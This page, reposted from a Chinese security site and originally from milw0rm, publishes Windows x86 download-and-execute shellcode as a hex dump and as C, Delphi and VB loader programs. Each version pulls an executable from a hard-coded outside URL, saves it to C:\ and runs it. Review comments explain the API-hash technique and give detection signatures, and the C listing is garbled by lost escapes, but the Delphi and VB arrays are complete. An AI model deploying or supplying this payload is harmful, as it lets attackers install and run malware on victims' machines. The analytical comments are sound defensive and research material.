win32 download & exec shellcode 203 bytes


milw0rm 上的 win32 download & exec shellcode:

EB548B753C8B74357803F5568B762003F533C94941AD33DB360FBE142838F27408C1CB0D03DA40EBEF3BDF75E75E8B5E2403DD668B0C4B8B5E1C03DD8B048B03C5C375726C6D6F6E2E646C6C00433A5C672E6578650033C064034030780C8B400C8B701CAD8B4008EB098B40348D407C8B403C95BF8E4E0EECE884FFFFFF83EC04832C243CFFD09550BF361A2F70E86FFFFFFF8B5424FC8D52BA33DB535352EB2453FFD05DBF98FE8A0EE853FFFFFF83EC04832C2462FFD0BF7ED8E273E840FFFFFF52FFD0E8D7FFFFFF687474703A2F2F7777772E786F78782E75732F646F776E6C6F61642F746573742E657865

VC++:
/*
    ______________________WIN_SHELLCODE__________________________
/ :: win32 download & exec shellcode                              ::
:: by Darkeagle of Unl0ck Research Team [http://exploiterz.org] ::
/ :: to avoid 0x00 use ^^xor^^ }:>                                ::
:: greets goes to: Sowhat, 0x557 guys, 55k7 guys, RST/GHC guys. ::
/ ::_____________________________cya______________________________::

*/

#include
#include

/*
 * Payload for the download-and-execute stub: 202 bytes of x86 code followed
 * by the URL it fetches, appended as a plain string literal.
 *
 * NOTE(review): the backslash of every "\x" escape was lost when this page
 * was extracted, so as printed these literals are ASCII text, not the byte
 * values. The Delphi and VB listings on this page carry the same stub as
 * numeric arrays.
 *
 * What the bytes show (useful for triage and for writing signatures):
 *  - 33 C0 64 03 40 30 reads the PEB pointer at fs:[0x30] and follows the
 *    loader's module list to get the kernel32 base, so the stub is 32-bit
 *    only.
 *  - The routine right after the initial EB 54 jump walks a module's export
 *    table and matches names by a rotate-right-13 additive hash
 *    (C1 CB 0D / 03 DA) rather than by string, so no API names appear.
 *  - The four constants loaded into EDI (BF ...) are the widely documented
 *    ROR-13 hashes of LoadLibraryA (0xEC0E4E8E), URLDownloadToFileA
 *    (0x702F1A36), WinExec (0x0E8AFE98) and ExitProcess (0x73E2D87E).
 *  - Plaintext inside the stub: "urlmon.dll" and the drop path "C:\U.exe",
 *    each ended by a 00 byte, so the stub is not NUL-free; presumably that
 *    is what the banner's XOR remark is about.
 *  - The stub loads urlmon.dll, saves the URL's content to C:\U.exe, runs
 *    that file and exits the process.
 *
 * The bare hex dump earlier on this page is the same stub with a different
 * drop name (43 3A 5C 67 ... = "C:\g.exe") and a different URL.
 *
 * Detection: the hash constants and the two embedded strings are stable
 * byte patterns; on the host, look for an urlmon.dll load in a process with
 * no reason to download, a new executable in the root of C:, and a child
 * process started from it.
 */
unsigned char sh4llcode[] =
"xEBx54x8Bx75x3Cx8Bx74x35x78x03xF5x56x8Bx76x20x03"
"xF5x33xC9x49x41xADx33xDBx36x0FxBEx14x28x38xF2x74"
"x08xC1xCBx0Dx03xDAx40xEBxEFx3BxDFx75xE7x5Ex8Bx5E"
"x24x03xDDx66x8Bx0Cx4Bx8Bx5Ex1Cx03xDDx8Bx04x8Bx03"
"xC5xC3x75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00x43x3Ax5C"
"x55x2ex65x78x65x00x33xC0x64x03x40x30x78x0Cx8Bx40"
"x0Cx8Bx70x1CxADx8Bx40x08xEBx09x8Bx40x34x8Dx40x7C"
"x8Bx40x3Cx95xBFx8Ex4Ex0ExECxE8x84xFFxFFxFFx83xEC"
"x04x83x2Cx24x3CxFFxD0x95x50xBFx36x1Ax2Fx70xE8x6F"
"xFFxFFxFFx8Bx54x24xFCx8Dx52xBAx33xDBx53x53x52xEB"
"x24x53xFFxD0x5DxBFx98xFEx8Ax0ExE8x53xFFxFFxFFx83"
"xECx04x83x2Cx24x62xFFxD0xBFx7ExD8xE2x73xE8x40xFF"
"xFFxFFx52xFFxD0xE8xD7xFFxFFxFF"
/* URL operand, kept outside the stub bytes; the literal's implicit NUL ends it. */
"http://h0nest.org/1.exe";

/*
 * Test harness: prints a banner, then calls the sh4llcode array as if it
 * were a function taking no arguments.
 *
 * NOTE(review): sh4llcode is an ordinary writable global, so with DEP/NX
 * enforced for the process the call below should fault instead of running.
 * The two #include lines above this listing also lost their header names in
 * extraction.
 */
int main()
{

 /* Function pointer that will be aimed at the data array. */
 void (*c0de)();
 /* NOTE(review): the \" and \n escapes in this literal lost their
    backslashes in extraction; as printed the line does not compile. */
 printf("Win32 "download & exec shellcode"n");
 /* Stores the array's address through an int-sized write, which assumes a
    pointer fits in an int (32-bit build). */
 *(int*)&c0de = sh4llcode;
 /* Control passes into the array; the stub's last resolved call is
    ExitProcess, so a return to main is not expected. */
 c0de();
}

// milw0rm.com [2005-12-23]

DELPHI:

// Delphi port of the same download-and-execute stub, stored as a byte table.
program download;

const

// 230 bytes: the 202-byte x86 stub followed by a NUL-terminated URL.
// Strings visible inside the stub: "urlmon.dll" ($75 $72 $6C ...) and the drop
// path "C:\U.exe" ($43 $3A $5C $55 ...). The $BF-prefixed dwords are the ROR-13
// name hashes of LoadLibraryA, URLDownloadToFileA, WinExec and ExitProcess.
// Detection: these hashes and strings are stable patterns for byte signatures.
ShellCode:Array [0..229] of Byte =
(
$EB, $54, $8B, $75, $3C, $8B, $74, $35, $78, $03,
$F5, $56, $8B, $76, $20, $03, $F5, $33, $C9, $49,
$41, $AD, $33, $DB, $36, $0F, $BE, $14, $28, $38,
$F2, $74, $08, $C1, $CB, $0D, $03, $DA, $40, $EB,
$EF, $3B, $DF, $75, $E7, $5E, $8B, $5E, $24, $03,
$DD, $66, $8B, $0C, $4B, $8B, $5E, $1C, $03, $DD,
$8B, $04, $8B, $03, $C5, $C3, $75, $72, $6C, $6D,
$6F, $6E, $2E, $64, $6C, $6C, $00, $43, $3A, $5C,
$55, $2E, $65, $78, $65, $00, $33, $C0, $64, $03,
$40, $30, $78, $0C, $8B, $40, $0C, $8B, $70, $1C,
$AD, $8B, $40, $08, $EB, $09, $8B, $40, $34, $8D,
$40, $7C, $8B, $40, $3C, $95, $BF, $8E, $4E, $0E,
$EC, $E8, $84, $FF, $FF, $FF, $83, $EC, $04, $83,
$2C, $24, $3C, $FF, $D0, $95, $50, $BF, $36, $1A,
$2F, $70, $E8, $6F, $FF, $FF, $FF, $8B, $54, $24,
$FC, $8D, $52, $BA, $33, $DB, $53, $53, $52, $EB,
$24, $53, $FF, $D0, $5D, $BF, $98, $FE, $8A, $0E,
$E8, $53, $FF, $FF, $FF, $83, $EC, $04, $83, $2C,
$24, $62, $FF, $D0, $BF, $7E, $D8, $E2, $73, $E8,
$40, $FF, $FF, $FF, $52, $FF, $D0, $E8, $D7, $FF,
$FF, $FF, $68, $74, $74, $70, $3A, $2F, $2F, $77,
$77, $77, $2E, $30, $78, $34, $66, $2E, $63, $6E,
$2F, $74, $65, $73, $74, $2E, $65, $78, $65, $00
); //www.0x4f.cn/test.exe

var
// Parameterless procedure pointer; it is aimed at the byte table, not at code.
ShellCodeProc: procedure;

begin
// Take the address of the ShellCode constant and call it as a procedure.
// NOTE(review): the table is data, so whether this runs or faults depends on
// the page protection and the process's DEP setting; confirm per build.
ShellCodeProc := @ShellCode;
ShellCodeProc();
end.

VB:

Attribute VB_Name = "Module1"
' Declares user32's CallWindowProcA with lpPrevWndFunc typed as a plain Long, so any
' numeric address can be passed as the "window procedure" that user32 will call.
' Sub Main below passes a data-buffer address here. Detection: a CallWindowProc
' whose first argument points outside any loaded module is worth flagging.
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
' Entry point: builds the stub as a Variant array, copies it into a Byte array and
' hands that array's address to CallWindowProc as the function to call.
Sub Main()
' Variant that receives the Array(...) of byte values.
Dim ShellCode
' Contiguous Byte buffer that the values are copied into before the call.
Dim download() As Byte
' Same 230 values as the Delphi table on this page: the 202-byte x86 stub, then the
' NUL-terminated URL. The stub contains the strings "urlmon.dll" and "C:\U.exe" and
' the ROR-13 name hashes of LoadLibraryA, URLDownloadToFileA, WinExec and ExitProcess.
ShellCode = Array(&HEB, &H54, &H8B, &H75, &H3C, &H8B, &H74, &H35, &H78, &H3, _
&HF5, &H56, &H8B, &H76, &H20, &H3, &HF5, &H33, &HC9, &H49, _
&H41, &HAD, &H33, &HDB, &H36, &HF, &HBE, &H14, &H28, &H38, _
&HF2, &H74, &H8, &HC1, &HCB, &HD, &H3, &HDA, &H40, &HEB, _
&HEF, &H3B, &HDF, &H75, &HE7, &H5E, &H8B, &H5E, &H24, &H3, _
&HDD, &H66, &H8B, &HC, &H4B, &H8B, &H5E, &H1C, &H3, &HDD, _
&H8B, &H4, &H8B, &H3, &HC5, &HC3, &H75, &H72, &H6C, &H6D, _
&H6F, &H6E, &H2E, &H64, &H6C, &H6C, &H0, &H43, &H3A, &H5C, _
&H55, &H2E, &H65, &H78, &H65, &H0, &H33, &HC0, &H64, &H3, _
&H40, &H30, &H78, &HC, &H8B, &H40, &HC, &H8B, &H70, &H1C, _
&HAD, &H8B, &H40, &H8, &HEB, &H9, &H8B, &H40, &H34, &H8D, _
&H40, &H7C, &H8B, &H40, &H3C, &H95, &HBF, &H8E, &H4E, &HE, _
&HEC, &HE8, &H84, &HFF, &HFF, &HFF, &H83, &HEC, &H4, &H83, _
&H2C, &H24, &H3C, &HFF, &HD0, &H95, &H50, &HBF, &H36, &H1A, _
&H2F, &H70, &HE8, &H6F, &HFF, &HFF, &HFF, &H8B, &H54, &H24, _
&HFC, &H8D, &H52, &HBA, &H33, &HDB, &H53, &H53, &H52, &HEB, _
&H24, &H53, &HFF, &HD0, &H5D, &HBF, &H98, &HFE, &H8A, &HE, _
&HE8, &H53, &HFF, &HFF, &HFF, &H83, &HEC, &H4, &H83, &H2C, _
&H24, &H62, &HFF, &HD0, &HBF, &H7E, &HD8, &HE2, &H73, &HE8, _
&H40, &HFF, &HFF, &HFF, &H52, &HFF, &HD0, &HE8, &HD7, &HFF, _
&HFF, &HFF, &H68, &H74, &H74, &H70, &H3A, &H2F, &H2F, &H77, _
&H77, &H77, &H2E, &H30, &H78, &H34, &H66, &H2E, &H63, &H6E, _
&H2F, &H74, &H65, &H73, &H74, &H2E, &H65, &H78, &H65, &H0)

' Size the Byte array to the same upper bound as the Variant array.
ReDim download(UBound(ShellCode))

' Element-by-element copy; i is never declared in this listing.
For i = 0 To UBound(ShellCode)
     download(i) = ShellCode(i)
Next

' Passes the address of the first byte as lpPrevWndFunc, so user32 calls into the
' buffer; the remaining four arguments are zero.
' NOTE(review): the buffer is array data, so with DEP enforced for the process this
' call should fault; confirm for the target runtime.
CallWindowProc VarPtr(download(0)), ByVal 0&, ByVal 0&, ByVal 0&, ByVal 0&

End Sub

文章来源于lcx.cc:win32 download & exec shellcode 203 bytes


免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。